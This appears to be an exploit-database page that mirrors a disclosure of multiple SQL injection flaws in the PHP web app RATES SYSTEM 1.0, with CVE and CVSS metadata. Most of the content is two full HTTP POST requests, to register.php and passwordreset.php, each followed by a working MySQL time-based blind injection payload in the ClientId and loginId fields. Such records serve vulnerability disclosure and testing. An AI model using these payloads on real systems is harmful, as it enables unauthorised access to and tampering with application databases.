Advertisement






RATES SYSTEM 1.0 SQL Injection

CVE Category Price Severity
CVE-2021-3863 CWE-89 $750 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2021-08-12
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.05012 0.76035

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080043

Below is a copy:

RATES SYSTEM 1.0 SQL Injection
# Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections
# Date: 11-08-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Software Link: https://www.sourcecodester.com/php/14904/rates-system.html
# Version: V1.0
# Category: Webapps
# Tested on: Linux/Windows

# Description:
# PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.

# Vulnerable Request:

POST /register.php HTTP/1.1
Host: localhost
Content-Length: 70
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/register.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf
Connection: close

ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456&register=

# Vulnerable Payload:
# Parameter: ClientId (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:

ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=&register=oQCR

--------------------------------------------------------------------------------------------------------------------------

# Vulnerable Request:

POST /passwordreset.php HTTP/1.1
Host: localhost
Content-Length: 61
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/passwordreset.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61
Connection: close

loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset=

# Vulnerable Payload:
# Parameter: loginId (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:

loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum